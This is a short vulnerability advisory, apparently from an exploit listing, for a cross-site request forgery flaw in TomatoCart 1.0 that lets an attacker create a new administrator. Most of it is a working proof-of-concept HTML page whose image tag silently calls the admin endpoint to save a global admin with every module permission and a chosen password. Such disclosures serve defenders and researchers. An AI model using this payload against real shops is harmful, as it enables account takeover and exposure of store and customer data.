Search
Software Vulnerability Tested On Date
TomatoCart 1.0 Cross-site Request Forgery Windows Vista + XAMPP 7/1/2010
Description
A cross-site request forgery vulnerability in TomatoCart 1.0 can be exploited to create a new admin.
Proof of Concept
<html>
    <body>
        <img src="http://localhost/tomatocart/admin/json.php?module=administrators&action=save_administrator&modules=categories%2Cfeature_products_manager%2Cmanufacturers%2Cproduct_variants%2Cproducts%2Cproducts_attributes%2Cproducts_expected%2Cquantity_discount_groups%2Creviews%2Csearch_terms%2Cspecials%2Cconfiguration%2Cwizard_installation%2Chomepage_meta_info%2Carticles%2Carticles_categories%2Cfaqs%2Cslide_images%2Crecorvered_cart%2Ccoupons%2Ccredits_memo%2Ccustomers%2Ccustomers_groups%2Cemail%2Cgift_certificates%2Cinvoices%2Corders%2Corders_returns%2Cpurchased_downloadables%2Ccountries%2Ccredit_cards%2Ccurrencies%2Cimage_groups%2Cinformation%2Clanguages%2Corders_status%2Ctax_classes%2Cunit_classes%2Cweight_classes%2Czone_groups%2Cmodules_geoip%2Cmodules_order_total%2Cmodules_payment%2Cmodules_shipping%2Cservices%2Creports_customers%2Creports_products%2Creports_web%2Clogo_upload%2Ctemplates%2Ctemplates_modules%2Ctemplates_modules_layout%2Cadministrators%2Cadministrators_log%2Cbackup%2Cbanner_manager%2Ccache%2Cdashboard%2Cemail_templates%2Cfile_manager%2Cgoogle_sitemap%2Cimages%2Cimport_export%2Cnewsletters%2Cserver_info%2Cwhos_online&access_globaladmin=on&user_name=new_admin&user_password=Password1&email_address=test%40test.com" />
    </body>
</html>